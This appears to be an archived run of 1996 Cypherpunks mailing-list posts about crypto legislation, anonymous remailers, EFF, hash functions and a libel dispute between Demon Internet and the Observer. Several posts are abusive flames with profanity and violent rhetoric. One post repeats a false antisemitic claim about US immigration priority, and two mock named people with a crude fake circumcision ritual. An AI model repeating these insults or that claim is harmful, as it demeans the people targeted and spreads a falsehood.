Be careful, Leahy's bill sucked. I don't classify it as "pro-crypto" at all, although if you believed those organizations that initially supported it you'd come to that conclusion. So somebody following your analysis (blindly) might have inadvertently embraced a clunker, concluding that supporting SOMETHING was important for the reasons you listed.

And while this may appear to be paranoia, I suspected that the whole reason for the Leahy bill was to get the "criminalization of the use of encryption" section on the books, the one truly awful part of the bill. The funny thing is, it almost worked! Didn't it, EFF?!?

Burns' bill seems to be at least moderately acceptable, in that it appears to remove most restrictions on crypto export. Further, I don't necessarily share your pessimism that these bills won't pass. Not this year, of course, but possibly next year.

Jim Bell
jimbell at pacifier.com

From jf_avon at citenet.net Wed Sep 4 01:12:14 1996
From: jf_avon at citenet.net (Jean-Francois Avon)
Date: Wed, 4 Sep 1996 16:12:14 +0800
Subject: [NOISE^2] Re: Voting Monarchist?
Message-ID: <9609040557.AA13191@cti02.citenet.net>

On 3 Sep 96 at 16:06, David M. Rose wrote:

> Dimitri, err, Dr. Vulis, or is that Dr. Nuri?,

Well, it astonishingly sounds the same...

Makes me think of a rabid Det<^h^h^h>Rotweiler.
:)

jfa

From qut at netcom.com Wed Sep 4 02:05:26 1996
From: qut at netcom.com (Dave Harman OBC)
Date: Wed, 4 Sep 1996 17:05:26 +0800
Subject: {Rich Graves Only} Enclosed
Message-ID: <199609040443.VAA23153@netcom.netcom.com>

Newsgroups: alt.revisionism,alt.fan.ernst-zundel,alt.politics.white-power
Subject: Re: Nomination: The Right Reverend Colin James III for Kook of the Month
References: <50i362$71q at Networking.Stanford.EDU>

In <50i362$71q at Networking.Stanford.EDU> llurch at stanford.edu (Rich Graves) writes:

! shlomo at bwalk.dm.com () writes:
! >The Right Reverend Colin James III got Andrew Mathis
! >fired from his second job in two months (at the Princeton Review, on Thursday).
! >I hereby nominate the dear bishop for both the Kook of the Month for September
! >1996 and for the Golden Killfile Award. Vote early and often!
!
! Vulis, you've already earned your Kook of the Month laurels. It's nap
! time.

Since you know that is Dr. D, why did you blame the harassment of Ingrid on Rev. Ron?!????? It looks like you did it to pin it on the doctor, or more likely, you saw the opportunity to harass Rev. Ron, even after you feigned praise of him!

It's the same damned header, IDJIT.

Of course, I never saw the headers for the unidentified harasser to the Zgrams list, was that the same header, too? It looks like you did it or you know who did it and you want to compound harassment on to nswpp! How Gravesian!

Is Dr. D your friend you're talking about? Dr. D, defect, defect! He's a jerk, jerk!

--
| | | | | | | | | | | | | | _|__|__|__|__ /--------------\ | | | 0 0 |--\ | * | | | \-------/ | | | \_____/ |__/ \______________/

From qut at netcom.com Wed Sep 4 02:54:01 1996
From: qut at netcom.com (Dave Harman OBC)
Date: Wed, 4 Sep 1996 17:54:01 +0800
Subject: Voting Monarchist?
In-Reply-To: <42oPTD12w165w@bwalk.dm.com>
Message-ID: <199609040710.AAA15682@netcom.netcom.com>

! qut at netcom.com (Dave Harman OBC) writes:
!
! > ! > > Vote Monarchist
! > ! >
! > !
> who is the candidate? LaRouche? ! > ! ! > ! Harry Brone is a fucking statist. If he weren't, he wouldn't be running ! > ! for president. Anyone who doesn't advocate killing all kings, presidents, ! > ! and prime ministers is a fucking statist and should be beaten to a pulp ! > ! with a rattan stick. ! > ! > That's the problem with the Libertarians, they've got some sort of ! > hang up about beatings. Must be some childhood difficulties. ! ! I ain't no fucking Libertarian. All Libertarians are fucking statists. They are. That's why I said the above. I just think voting Libertarian or American Independant would be easy choices, for *single issue* purposes only, their entire packages seperate or together, suck. ! P.S. you also wrote: ! ! ]Andie, that forgery was either Dr. Fuckhead, or someone trying to pin ! ]the blame on the good doctor. I'm glad {s}he posted it, it was funny ! ]and it also gave a hint who did the forgery of Ingrid. Either ! ]someone out to get him, or the doctor himself, if so, he lives in ! ]New York City too! Maybe you can meet your secret admirer! ! ! While Rich Graves is a proven liar and forger, the article you refer ! to is a perfectly good and authentic article from Rabbi Shlomo R. Sure! Why don't you just respond to the e-mail I sent you directly, Dr. D Graves! I, myself, study with the *real* Rabbi Schlomo. ! I don't know who forged Ingrid - probably Rich Graves, a proven forger, ! liar, and a fucking Libertarian statist. ! ! ]Now if it's someone out to get the doctor, I'd pin the blame on ! ]Rich Graves, because of his obssessive hatred of Ingrid, in which ! ]he did the post so it could be blamed on Dr. Fuckhead, who ! ]perhaps would hate Ingrid too, because she has written many times ! ]about how her family was hurt by Russians and Jews. Dr. Fuckhead ! ]may be Jewish, you know, since 80% of immigrants from Russia this ! ]generation have been Jewish, because Jews have first priorty in ! ]USA immigration law. ! ! Yes, I'm Jewish. 
Aren't we all, really, deep down, I mean, when we real little, I mean, in mind, yesterday, year, in the past. From tcmay at got.net Wed Sep 4 03:00:42 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 4 Sep 1996 18:00:42 +0800 Subject: The Esther Dyson Flap Message-ID: At 3:16 AM 9/4/96, Mike Duvos wrote: >Timothy C. May writes: > > > Indeed, I support the elimination of concepts such as > > "slander" and "libel" precisely because they cause more harm > > than good. Currently, there is an illusion among ordinary > > citizens that "if that was untrue, you could sue him for > > libel!" despite the fact that this is rarely practical. In > > that way, the law actually adds credibility to what should > > be an incredible claim. Eliminate libel suits, and you've > > eliminated any presumption that because it's been spoken or > > is in print, it's likely to be correct. I didn't write this. I agree with it, though. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." 
From pstira at escape.com Wed Sep 4 04:36:50 1996 From: pstira at escape.com (pstira at escape.com) Date: Wed, 4 Sep 1996 19:36:50 +0800 Subject: their is a new mailing list In-Reply-To: <199609032335.QAA09136@adnetsol.adnetsol.com> Message-ID: On Tue, 3 Sep 1996, Ross Wright wrote: > > To: cypherpunks at toad.com > > From: hack5 at juno.com (patrick b cummings) > > Date: Tue, 03 Sep 1996 16:14:40 EDT > > > their is a new mailing list for all you hackers just email your name or > > handle and e-mail address and youll be subscribed > > send information to hack5 at juno.com > > Am I missing something here? Is this guy fucking crazy? I think "crazy" and idiocy are two different things, Herr Ross. ;) Millie sfuze at tiac.net From dlv at bwalk.dm.com Wed Sep 4 07:19:07 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 4 Sep 1996 22:19:07 +0800 Subject: Learning time for you In-Reply-To: <19960904053342.25462.qmail@squirrel.owl.de> Message-ID: >From fiction!squirrel.owl.de!mix at golden-gate.owl.de Wed Sep 4 03:05:08 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Wed, 04 Sep 96 06:45:37 EDT for dlv Received: from golden-gate.uni-paderborn.de by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA10409 for dlv at bwalk.dm.com; Wed, 4 Sep 96 03:05:08 -0400 Received: by golden-gate.owl.de (Smail3.1.28.1) from fiction with uucp id ; Wed, 4 Sep 96 09:03 MET DST Received: by fiction.pb.owl.de id m0uyC1m-00005mC; Wed, 4 Sep 96 09:05 MET DST Return-Path: Received: (qmail-queue invoked by uid 200); 4 Sep 1996 05:33:42 -0000 Date: 4 Sep 1996 05:33:42 -0000 Message-Id: <19960904053342.25462.qmail at squirrel.owl.de> To: dlv at bwalk.dm.com From: Squirrel Remailer X-Comment1: This message did not originate from the X-Comment2: above address. It was automatically remailed X-Comment3: by an anonymous mail service. 
Please report X-Comment4: problems or inappropriate use to X-Comment5: Subject: Learning time for you Vulis, your comments include the following: >Comments: Dole/Kemp '96 and you have yelled about Harry Browne enough. LEARN TO SHUT UP! This is a Perrygram. Just can the constant noise for a day 'till I get back to my computer at home, where you are killfiled. Keep it down to a reasonable number of messages a day, or you will see others respond as you do. From dlv at bwalk.dm.com Wed Sep 4 07:38:13 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 4 Sep 1996 22:38:13 +0800 Subject: {Rich Graves Only} Enclosed In-Reply-To: <199609040443.VAA23153@netcom.netcom.com> Message-ID: qut at netcom.com (Dave Harman OBC) writes: > Since you know that is Dr. D, why did you blame the harassment of > Ingrid on Rev. Ron?!????? It looks like you did it to pin it on the doctor, > or more likely, you saw the opportunity to harass Rev. Ron, even > after you feigned praise of him! It's the same damned header, IDJIT. > > Of course, I never saw the headers for the unidentified harasser to > the Zgrams list, was that the same header, too? It looks like you did > it or you know who did it and you want to compound harassment on to > nswpp! How Gravesian! Is Dr. D your friend you're talking about? Dr. > D, defect, defect! He's a jerk, jerk! Rich Graves is no friend of mine. He's a liar and a forger, as is Ron Newman. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jonl at well.com Wed Sep 4 08:15:19 1996 From: jonl at well.com (Jon Lebkowsky) Date: Wed, 4 Sep 1996 23:15:19 +0800 Subject: What is the EFF doing exactly?
Message-ID: <2.2.32.19960904121017.006cbc1c@mail.well.com> At 10:33 PM 9/3/96 -0800, jim bell wrote: >At 10:41 PM 9/3/96 -0500, Jon Lebkowsky wrote: >>The terms "responsibility" and "accountability" are misused, which is >>unfortunate, since I think we'd all argue in favor of taking responsibility >>for our speech/actions in a positive sense. The negative is in asking me to >>sacrifice my freedom because some few behave irresponsibly. This is like >>setting an illogical default, assuming that it's a preventive, but it >>prevents nothing. >> >>Getting beyond this discussion of EFF, has any global entity discussed >>making remailers illegal? > >The Leahy crypto bill introduced early this year made (paraphrasing) "the >use of encryption to thwart a law-enforcement investigation illegal." I >immediately pointed out that while this wouldn't make _encrypted_ remailers >illegal, per se, effectively it would because the moment an investigation >(even a phony or trumped-up one) is started and is "thwarted" by the >encryption used, the remailer operator became guilty of a crime. Is that true? Or is it that the individual user would be guilty of a crime? The real problem, to me, is that the remailer operator might be required to breach anonymity; cf the decision in Finland that led Julf to squash anon.penet.fi. -- Jon Lebkowsky FAX (512)444-2693 http://www.well.com/~jonl Electronic Frontiers Forum, 6PM PDT Thursdays "No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky From jonl at well.com Wed Sep 4 08:17:19 1996 From: jonl at well.com (Jon Lebkowsky) Date: Wed, 4 Sep 1996 23:17:19 +0800 Subject: Reputations Message-ID: <2.2.32.19960904115805.006d2790@mail.well.com> At 08:40 PM 9/3/96 -0700, Timothy C. May wrote: >And so on. Many of the debates about anonymity seem to ignore reputations, >filters, kill files. 
It is almost as if the critics of anonymous speech are >saying "If there is not accountability for restaurant recommendations, >we'll all be buried in garbage food." This ignores the _emergent order_ or >_evolutionary_ nature of actors in the restaurant and restaurant evaluator >market. Could be a lack of understanding of the possibility of authentication, which IMO can be necessary for 'reputation' to be viable. >Free speech is often messy. 98% of everything I read or hear is crap, to do >Sturgeon one better. But I use judgement to decide what to read, who to >listen to, and what to mostly ignore. I use _reputation_ to choose >restaurants, books, movies, speakers to listen to, etc. > >Sometimes I listen to anonymous speech, but mostly I don't. Pseudonyms take >a while to gather a "positive reputation," and some never do. This is the >way speech works. "Accountability" is a red herring. I wouldn't exactly say that...but it's more of a personal responsibility thing. Our model should be default acceptance of responsibility for words and deeds, but I see that as a personal issue, not a matter for 'enforcement.' -- Jon Lebkowsky FAX (512)444-2693 http://www.well.com/~jonl Electronic Frontiers Forum, 6PM PDT Thursdays "No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky From jonl at well.com Wed Sep 4 08:25:36 1996 From: jonl at well.com (Jon Lebkowsky) Date: Wed, 4 Sep 1996 23:25:36 +0800 Subject: What is the EFF doing exactly? Message-ID: <2.2.32.19960904115249.006b6580@mail.well.com> At 07:44 AM 9/3/96 -0700, James A. Donald wrote: >At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote: >> Not necessarily. The character of the anonymous speech is decisive. If you >> use anonymity to cloak harassment, for instance, the anonymity (which >> removes accountability) is a problem. The accountability issue is real and >> should be addressed, not evaded. > >No: The harassment is the problem, not the anonymity that makes it >possible. 
The harassment is one problem, the lack of accountability another. Which is not to say that 'lack of accountability' should be 'fixed' by some sort of blanket restriction...but it should be acknowledged as a problem. -- Jon Lebkowsky FAX (512)444-2693 http://www.well.com/~jonl Electronic Frontiers Forum, 6PM PDT Thursdays "No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky From jonl at well.com Wed Sep 4 08:27:25 1996 From: jonl at well.com (Jon Lebkowsky) Date: Wed, 4 Sep 1996 23:27:25 +0800 Subject: What is the EFF doing exactly? Message-ID: <2.2.32.19960904120641.006c3388@mail.well.com> At 09:11 PM 9/3/96 -0700, Timothy C. May wrote: >Both terms are _overloaded_, probably to the point of not even being useful >terms for this debate. Everyone comes in to the debate with their notions >of what "responsible" speech is, what "accountability" entails, etc. > >Having said this, and not knowing how your (or anyone else's) definitions >relate to mine, I simply don't agree that I have to take responsibility for >all of my speech/actions. I can think of many cases where I have elected to >use untraceable anonymity, as many others have, so those are direct >counterexamples to your point, thus disproving your "I think we'd all argue >in favor of taking responsibility" point. The semantic point is a good one, but I'd like to see an example of a situation where you don't think you should take responsibility for something you've said or done. I'm not sure whether we agree or not on that one...it could be we're coming from different dimensions... >>Getting beyond this discussion of EFF, has any global entity discussed >>making remailers illegal? >> > >By "global entity" do you mean the U.N., or the Borg? The G7 issued a >typically vague statement about cracking down on terrorist >communications...this could be construed as the beginnings of an assault on >Cypherpunkish sorts of things. Too soon to tell. Well, we all know what the Borg think. 
I probably should have said 'governments' rather than 'global entities.' >Within the U.S. there are few ways remailers could be shut down, in terms >of legal action. The various Supreme Court cases have been discussed many >times. My real question is whether there is a real rather than possible legislative threat that demands action now. thx jonl -- Jon Lebkowsky FAX (512)444-2693 http://www.well.com/~jonl Electronic Frontiers Forum, 6PM PDT Thursdays "No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky From stewarts at ix.netcom.com Wed Sep 4 08:34:20 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Wed, 4 Sep 1996 23:34:20 +0800 Subject: Message Digest Message-ID: <199609041218.FAA19800@toad.com> At 11:31 AM 9/3/96 -0400, you wrote: >> I'm interested in a 256 bits (or more) message digest algorithm >> (C source is better). Any URLs ? >Try HAVAL. It is a variable one-way hash function that is apparently secure >against collisions. It should be on any of the standard crypto FTP sites. Or there's the simple "MD5(x),SHA(x)", which is 288 bits long and has the advantage that the two parts have different characteristics and have been looked at (separately) by many people, so concatenating them should be fairly strong. Or "MD5(SHA(x)),SHA(MD5(x))" if you're paranoid. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From declan at well.com Wed Sep 4 08:46:09 1996 From: declan at well.com (Declan McCullagh) Date: Wed, 4 Sep 1996 23:46:09 +0800 Subject: Workers of the Web, UNITE! In-Reply-To: <19960907.023551.4311.0.weirdprincess@juno.com> Message-ID: On Wed, 4 Sep 1996, John Doe wrote: > PLEASE TAKE ME OFF OF YOUR MAILING LIST... Never! Join us in standing up for collective rights and against corporate cyber-rapaciousness! 
In solidarity, Declan From frogfarm at yakko.cs.wmich.edu Wed Sep 4 08:54:43 1996 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Wed, 4 Sep 1996 23:54:43 +0800 Subject: Workers of the Web, UNITE! In-Reply-To: Message-ID: <199609041227.IAA20694@yakko.cs.wmich.edu> *This* sub-"minimum wage" worker does NOT want any "help" from unions, and will resist any and all attempts to forcibly induct him into one. I love how if I'm lucky and/or skilled enough to become a "boss", I am suddenly become EEEEvil in their eyes. Fuck 'em. -- http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information Hey, Bill Clinton: You suck, and those boys died! I hope you die! I feel a groove comin' on $ Freedom...yeah, right. From frogfarm at yakko.cs.wmich.edu Wed Sep 4 09:03:27 1996 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Thu, 5 Sep 1996 00:03:27 +0800 Subject: Voting Monarchist? In-Reply-To: <42oPTD12w165w@bwalk.dm.com> Message-ID: <199609041232.IAA20787@yakko.cs.wmich.edu> Would some kind soul out there be willing to instruct a novice in the mysteries of procmail? I've finally decided to start killfiling my mail as well as my news. -- http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information Hey, Bill Clinton: You suck, and those boys died! I hope you die! I feel a groove comin' on $ Freedom...yeah, right. From minow at apple.com Wed Sep 4 09:51:15 1996 From: minow at apple.com (Martin Minow) Date: Thu, 5 Sep 1996 00:51:15 +0800 Subject: Letter to the Observer [re: Internet paedophile] Message-ID: Forwarded to me by a friend: Path: reboot.demon.co.uk!news.demon.co.uk!dispatch.news.demon.net!demon! muir-et2.staff.demon.net!SERVER!not-for-mail From: malcolm at muir-et2.staff.demon.net (Malcolm Muir) Newsgroups: demon.announce Subject: Letter to the Observer Followup-To: demon.service Date: 1 Sep 96 07:25:38 GMT Organization: Demon Internet Ltd. 
Lines: 188 Approved: Malcolm at demon.net Message-ID: <32293a72.0 at muir-et2.staff.demon.net> Reply-To: pr at demon.net NNTP-Posting-Host: muir-et2.staff.demon.net X-NNTP-Posting-Host: muir-et2.staff.demon.net X-Newsreader: TIN [Windows/NT 1.3 950824BETA PL0] The following letters were delivered to the Editor of the Observer last week as a request to publish a retraction of their article relating to the Internet that appeared on Sunday 25th. August. Since a full retraction has not been published, we feel it is right to circulate copies of the letters to our customers. Copies of the letters may also be viewed on the World Wide Web at: http://www.demon.net/observer1.html (Solicitors Letter) and http://www.demon.net/observer2.html (Open letter from the Chairman) Malcolm Muir Demon Internet --------------------------------------------------------------------- Jeffrey Green Russel Solicitors Apollo House 56 New Bond Street London W1Y 0SX 0171-499 7020 The Editor The Observer Newspaper Guardian Newspapers Limited 119 Farringdon Road London EC1R 3ER 30th August 1996 By Hand and Fax: 0171 713 4250 Our ref: DRJ/JHG/[c]423395/9403.047 Dear Sir, RE: Our Clients: Demon Internet Limited and Mr Clive Feather We act on behalf of Demon Internet Limited and Mr Clive Feather both of whom were the subject of articles which appeared on the front page and on page 19 of your newspaper in the edition of Sunday, 25th August. In the offending article you have represented that our clients are "Pedlars of child abuse" and are "Key links in the international paedophile chain". You have represented that both our clients actively support the supply of paedophile material. This allegation is entirely false and is a most serious and outrageous libel. Our clients are most distressed by the publication of the offending statements which are inaccurate and grossly defamatory of them and which will cause damage to their goodwill and reputation, professionally, commercially and socially. 
Both Mr Feather and Demon Internet Limited have been the subject of serious expressions of concern and outrage from various of the readers of your newspaper. The damage that you have done to our clients cannot, of course, be undone but it can be mitigated. We require that you mitigate the serious damage that has been done to our clients by publishing the enclosed letter from Mr A W Mudd, Chairman of Demon Internet Limited. You were well aware, when you decided to publish the false article in question, of the damage that would be caused to our clients which is already very considerable and which will form the basis of a claim for special damages. It is open to you to mitigate that substantial loss at the earliest possible time by publishing a full retraction and apology in this coming Sunday's edition of your newspaper. We shall, within the next week or so, issue a Writ and deliver a Statement of Claim. In the meantime, we reserve all our clients' rights in the matter and nothing contained in this letter or in the enclosed letter from Mr Mudd shall be regarded as a diminution or waiver of those rights. Yours faithfully, JEFFREY GREEN RUSSELL --------------------------------------------------------------------- Demon Internet Limited Gateway House 322 Regents Park Road London N3 2QQ 0181 371 1000 Our ref : AWM/SC/28-08 The Editor The Observer Newspaper Guardian Newspapers Limited 119 Farringdon Road London EC1R 3ER 30 August 1996 Dear Sir THE PEDLARS OF CHILD ABUSE Banner headline: Front page and Page 19 : Sunday 25th August 1996 I refer to your articles on the front page and page 19 of last Sunday's paper. I regard these as highly defamatory as well as a poor piece of journalism that sensationalises a serious issue and clouds fact with emotion. I am appalled and outraged that The Observer has printed such a misleading, abusive and inaccurate article - giving the impression to readers that Clive Feather and Demon Internet are the "Pedlars of child abuse".
This libellous reporting, littered with malicious lies not only defames the good character and reputation of a valued employee, but also destroys the genuine efforts Demon Internet has been making in conjunction with the police and the DTI to deal effectively with the problem. The articles clearly aimed at sensationalism at any cost with the intention of misleading readers by stating that our employee is an "Internet abuser" immediately after using the word "paedophiles". As the UK's largest provider of Internet access, Demon has taken the lead in discussions with all relevant parties and is in the process of announcing restrictions to illegal material and processes to classify content, enabling users to monitor and report on what is viewed. Demon Internet is also the first European Internet Service Provider to deliver Microsoft's new browser software, 'Internet Explorer' which incorporates a classifications standard. Demon Internet has been taking action to ensure that the Internet in the UK has informed and appropriate legislation guarding the interests of users. This report not only confuses an extremely complex and sensitive issue but also smears the integrity of an honourable, family man. Demon Internet is committed to eliminating this scourge from this new and rapidly expanding market. The Internet is bringing great benefit to millions of users not least your own journalists. For you to pick on one aspect in total isolation and present it in such a lurid fashion, does not help the DTI, the police or ourselves who are genuinely striving to solve the issues. Would you please publish this letter in your edition of 1st September. Your unreserved apology and full retraction, to be given as great prominence as your original articles, would also be greatly appreciated Yours faithfully, A W Mudd Chairman -- Malcolm S. Muir Demon Internet Ltd. 
Sunderland 322 Regents Park Road England London N3 2QQ From liberty at gate.net Wed Sep 4 10:03:39 1996 From: liberty at gate.net (Jim Ray) Date: Thu, 5 Sep 1996 01:03:39 +0800 Subject: GAR [was:Re: What is the EFF doing exactly?] Message-ID: <199609041311.JAA14994@osceola.gate.net> Tim May wrote: ... >The reason this is such a hot button for Cypherpunks is that "responsible >freedom" and "accountability" are often code words for controlling some >very basic freedoms. Placing limits on anonymous speech would involve some >very fundamental restrictions on freedoms of various sorts. Even if >"safeguards" are built-in, the effect would almost certainly be to >illegalize remailers (unless they had "escrow" features!). Again, and as Tim is aware, this is not the true meaning of the fine old word "escrow," which as we all know involves neutral, trusted third parties. I think that this requires a new term, so I am now proposing one: "GAR -- Government Access to Remailers." In real life, the gar is a fish that lives in great numbers in the Everglades, just west of where I type. They can grow to a very large size. The fossil record indicates that this species has been around, unchanged, since dinosaur times. Keeping the Pinocchio tale in mind, I find it quite fitting that the gar has a *very* long nose in relation to its body. ;) >And a wide array >of other freedoms, too numerous for me to write about here. Indeed. JMR Regards, Jim Ray -- DNRC Minister of Encryption Advocacy "Whoever would overthrow the liberty of a nation must begin by subduing the freeness of speech." -- Benjamin Franklin "As govt.s grow arithmetically, corruption grows exponentially." -- Ray's Law of official corruption. Defeat the Duopoly! Stop the Browne out. Harry Browne for President. Jo Jorgensen for Vice-president.
http://www.HarryBrowne96.org/ http://www.twr.com/stbo ___________________________________________________________________ PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 http://www.shopmiami.com/prs/jimray ___________________________________________________________________ From minow at apple.com Wed Sep 4 10:15:00 1996 From: minow at apple.com (Martin Minow) Date: Thu, 5 Sep 1996 01:15:00 +0800 Subject: Workers of the Web, UNITE! Message-ID: >Tired: Libertarian cypherpunks >Wired: Crypto-socialists > The Wobblies are a prime example of Tom Lehrer's comment: "They won all of the battles, but we had all the good songs." Up the Revolution. Martin (crypto social democrat) From sshelby.fn.net at wichita.fn.net Wed Sep 4 10:33:29 1996 From: sshelby.fn.net at wichita.fn.net (Steve Shelby) Date: Thu, 5 Sep 1996 01:33:29 +0800 Subject: Spam, and how to stop it. Message-ID: <199609041353.IAA10678@wichita.fn.net> To: cypherpunks at toad.com Date: Wed Sep 04 08:53:00 1996 Hello all. I assist in running an ISP. We recently had a problem with some of the users massmailing from our server. We would have never known, but someone on CompuServe that didn't like it mailed our support email address. We checked into it, and I called the two people voice. It's pretty gratifying to be able to talk to one of these spammer massmailer 'get rich quick' scheme people directly. What I'm looking for is a way to monitor the amount of mail leaving the system per user. I'm not interested in poking into users' mail, but I would like the ability to spot other users sending out more than x messages per x minutes.
If anyone has any tips on this subject I'd like to hear them. Spam and massmailing is one of the major things that's bogging down the net these days, I believe. Thanks From michael.tighe at Central.Sun.COM Wed Sep 4 10:35:41 1996 From: michael.tighe at Central.Sun.COM (Michael Tighe SUN IMP) Date: Thu, 5 Sep 1996 01:35:41 +0800 Subject: Silenced Machine Guns Are Safer Than TWA In-Reply-To: Message-ID: <199609041352.IAA07442@jeep.Central.Sun.COM> >>So? I was talking about NEW sales of firearms from license holders. Let's >>consider improving the future rather than preserving the past, shall >>we? >My apologies! I assumed when you wrote "since the 1968 Gun Control Act" you >meant since the 1968 Gun Control Act. I did not realize that you translate >"since the 1968 Gun Control Act" into "NEW sales of firearms." Well, maybe you are both right. "Since the 1968 Gun Control Act" all "NEW sales of firearms" from an FFL dealer to the first customer have been tracked via Form 4473. From qut at netcom.com Wed Sep 4 10:42:54 1996 From: qut at netcom.com (Dave Harman OBC) Date: Thu, 5 Sep 1996 01:42:54 +0800 Subject: Andrew "skippy" Mathis converts to Judaism - Film at 11 In-Reply-To: Message-ID: <199609041444.HAA01429@netcom18.netcom.com> ! I circumcized Andrew "Skippy" Mathis with my own hand, ! as the Right Reverend Colin James III pronounced the blessings. ! ! Igor Chudov, our understudy, sucked out the blood. No, you forget, Brother Schlomo, Rich Graves did the cutting and Dr. Fuckhead did the sucking. From the right hand to the left! You're a little confused about when you circ'ed Dr. Fuckhead and he ended up with gangrene, that was before Mr.
Graves decided to use anti-septics, I was the first with the new style rite. From shlomo at bwalk.dm.com Wed Sep 4 11:13:46 1996 From: shlomo at bwalk.dm.com (Rabbi Shlomo Ruthenberg) Date: Thu, 5 Sep 1996 02:13:46 +0800 Subject: Andrew "skippy" Mathis converts to Judaism - Film at 11 Message-ID: I circumcized Andrew "Skippy" Mathis with my own hand, as the Right Reverend Colin James III pronounced the blessings. Igor Chudov, our understudy, sucked out the blood. Amen. From declan at eff.org Wed Sep 4 11:17:04 1996 From: declan at eff.org (Declan McCullagh) Date: Thu, 5 Sep 1996 02:17:04 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <2.2.32.19960904034147.006f6cd4@mail.well.com> Message-ID: On Tue, 3 Sep 1996, Jon Lebkowsky wrote: > Getting beyond this discussion of EFF, has any global entity discussed > making remailers illegal? Others have responded with information about the Church of Scientology and similar threats to remailers. I would add that global entities haven't woken up to the threat of anonymous remailers and that remailers aren't widely deployed yet -- two conditions that when they change will be sufficient for a global crackdown. My cover story in last month's issue of _Internet Underground_ magazine discussed how governments can move quickly to craft international treaties that could muzzle the Net. This is what we have to be on the lookout for; in fact, we need to have a "friendly" country introduce an opposing proposal that countries can bicker over for decades, while the Net matures and strengthens and improves its defenses against this type of attack. -Declan // declan at eff.org // I do not represent the EFF // declan at well.com // From frissell at panix.com Wed Sep 4 12:05:41 1996 From: frissell at panix.com (Duncan Frissell) Date: Thu, 5 Sep 1996 03:05:41 +0800 Subject: Workers of the Web, UNITE! 
Message-ID: <2.2.32.19960904150225.008a22a8@panix.com> At 06:38 AM 9/4/96 -0700, Martin Minow wrote: >The Wobblies are a prime example of Tom Leherer's comment: > >"They won all of the battles, but we had all the good songs." > >Up the Revolution. > >Martin (crypto social democrat) I dreamed I saw Joe Hill last night, Alive as you or me Says I, "But Joe, you're ten years dead," "I never died," says he "I never died," says he "The copper bosses killed you, Joe, They shot you, Joe," says I. "Takes more than guns to kill a man," Says Joe, "I didn't die," Says Joe, "I didn't die." See: http://www.bluemarble.net/~mitch/iww/lrs.html for more. DCF "Who wonders where his IWW card is -- 'Unemployed Worker' (Student) Dues 50 cents a month." It was the only organization on the Attorney General's list I could still join in 1970. You had to be there... From jamesd at echeque.com Wed Sep 4 12:29:56 1996 From: jamesd at echeque.com (James A. Donald) Date: Thu, 5 Sep 1996 03:29:56 +0800 Subject: What is the EFF doing exactly? Message-ID: <199609041557.IAA00984@dns1.noc.best.net> At 10:33 PM 9/3/96 -0800, jim bell wrote: >>The Leahy crypto bill introduced early this year made (paraphrasing) "the >>use of encryption to thwart a law-enforcement investigation illegal." I >>immediately pointed out that while this wouldn't make _encrypted_ remailers >>illegal, per se, effectively it would because the moment an investigation >>(even a phony or trumped-up one) is started and is "thwarted" by the >>encryption used, the remailer operator became guilty of a crime. At 07:10 AM 9/4/96 -0500, Jon Lebkowsky wrote: > Is that true? Or is it that the individual user would be guilty of a crime? Since the individual user would already be guilty of a crime, if he is using the remailer to conceal his crimes, the paragraph in question would be fairly useless and irrelevant unless it had the meaning that Jim Bell attributes to it. 
I believe that judges have a policy of interpreting deliberately ambiguous statutes in whatever way makes the most sense. The only sensible interpretation of Leahy's bill is that it criminalizes strong remailers, that it is intended to punish ANYONE, not just the criminals themselves, who obstructs investigations. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jamesd at echeque.com Wed Sep 4 12:32:04 1996 From: jamesd at echeque.com (James A. Donald) Date: Thu, 5 Sep 1996 03:32:04 +0800 Subject: What is the EFF doing exactly? Message-ID: <199609041557.IAA00970@dns1.noc.best.net> At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote: >>> Not necessarily. The character of the anonymous speech is decisive. If you >>> use anonymity to cloak harassment, for instance, the anonymity (which >>> removes accountability) is a problem. The accountability issue is real and >>> should be addressed, not evaded. At 07:44 AM 9/3/96 -0700, James A. Donald wrote: >>No: The harassment is the problem, not the anonymity that makes it >>possible. At 06:52 AM 9/4/96 -0500, Jon Lebkowsky wrote: >The harassment is one problem, the lack of accountability another. So: Lucky Green and Dark Unicorn are not accountable. This is a problem? Because it is a problem "We" need to do something about it, --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. 
| jamesd at echeque.com

From qut at netcom.com Wed Sep 4 12:35:46 1996
From: qut at netcom.com (Dave Harman OBC)
Date: Thu, 5 Sep 1996 03:35:46 +0800
Subject: How To Do Cgi Against www.anonymizer.com
